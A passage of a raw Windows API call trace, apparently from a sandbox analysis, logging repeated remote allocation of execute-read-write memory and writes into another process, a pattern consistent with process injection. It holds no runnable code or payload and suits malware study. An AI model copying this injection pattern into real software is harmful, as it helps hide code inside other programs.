ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.107] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.107] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.107] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.107] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.107] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.108] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.108] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001c, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.108] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.108] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2f0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.108] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.108] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c566*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c566*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0241.108] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.108] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.109] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.109] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.109] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.109] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.109] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.110] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.110] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.110] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.110] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.110] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.110] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2f8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.110] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.110] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c56e*, NumberOfBytesToWrite=0x7, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c56e*, NumberOfBytesWritten=0x28df88*=0x7) returned 0x0 [0241.111] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.111] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.111] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.111] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.111] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.111] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.111] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.112] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.112] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.112] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.112] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20017, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.112] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.112] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a300, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.112] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.113] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c578*, NumberOfBytesToWrite=0x5, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c578*, NumberOfBytesWritten=0x28df88*=0x5) returned 0x0 [0241.113] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.113] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.113] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.113] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.113] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.114] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.114] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.114] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.114] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.114] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.114] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20015, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.114] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.115] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a308, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.115] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.115] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c580*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c580*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0241.115] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.115] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.115] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.116] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.116] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.116] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.116] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.116] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.116] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.116] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.117] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20018, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.117] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.117] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a310, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.117] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.117] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c58a*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c58a*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0241.117] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.117] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.118] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.118] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.118] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.118] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.118] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.119] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.119] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.119] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.119] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.119] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.119] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a318, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.119] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x23, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.119] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c596*, NumberOfBytesToWrite=0xb, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c596*, NumberOfBytesWritten=0x28df88*=0xb) returned 0x0 [0241.120] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.120] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.120] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.120] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.120] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.120] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.120] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.121] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.121] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.121] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.121] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001b, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.121] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.121] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a320, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.121] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.122] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c45c*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c45c*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.122] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.122] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.122] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.122] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.123] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.123] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.123] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.123] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.123] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.123] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.123] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.123] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.124] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a328, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.124] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x20, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.124] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c46c*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c46c*, NumberOfBytesWritten=0x28df88*=0x8) returned 0x0 [0241.124] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.124] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 